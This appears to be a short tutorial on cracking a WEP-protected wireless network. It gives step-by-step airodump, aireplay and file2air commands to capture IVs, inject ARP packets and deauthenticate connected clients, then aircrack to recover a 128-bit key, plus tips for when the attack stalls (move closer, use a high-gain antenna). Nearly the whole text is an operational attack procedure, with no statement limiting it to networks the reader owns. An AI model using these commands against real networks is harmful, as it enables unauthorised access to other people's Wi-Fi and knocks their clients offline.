First thing you will need to do is run airodump to capture the necessary IVs.
usage: airodump ath0 <file prefix> <channel> 1
e.g.
#airodump ath0 capture 9 1
Do NOT close down airodump, open a new shell and start aireplay:
usage: aireplay -3 -b <Networks BSSID> -h <client MAC address> -m 68 -n 68 -d ff:ff:ff:ff:ff:ff ath0
If you are unable to capture an ARP packet you can dissasociate
the client and to force it to ARP, you can do this using file2air or aireplay, open
a third shell and start file2air/aireplay with the following parameters:
#aireplay -0 1 -a <AP_MAC> -c <Client_MAC> ath0
or
#file2air -i ath0 -r madwifi -n 8000
-d <client MAC address> -s <APs MAC address> -b
<Networks BSSID> -f /KNOPPIX/files/deauth.bin NOTE: THIS CAN CAUSE THE KERNEL TO CRASH
If this fails to produce an ARP you will have to try one or more of the following
Move closer to the target
Use a high gain antenna
Increase the number after the -n from 8000
Try a different .bin file, such as beacon.bin
You will need to capture approximately 1 million ivs to crack a 128-bit
WEP key. When you have done this you then run aircrack:
#aircrack capture.ivs
NOTE: It is possible to run aircrack in parallel with airodump but in
practice I have found that this will not always crack the WEP key, once
airodump has been stopped the WEP key is usually found in a matter of
seconds.
<HOME>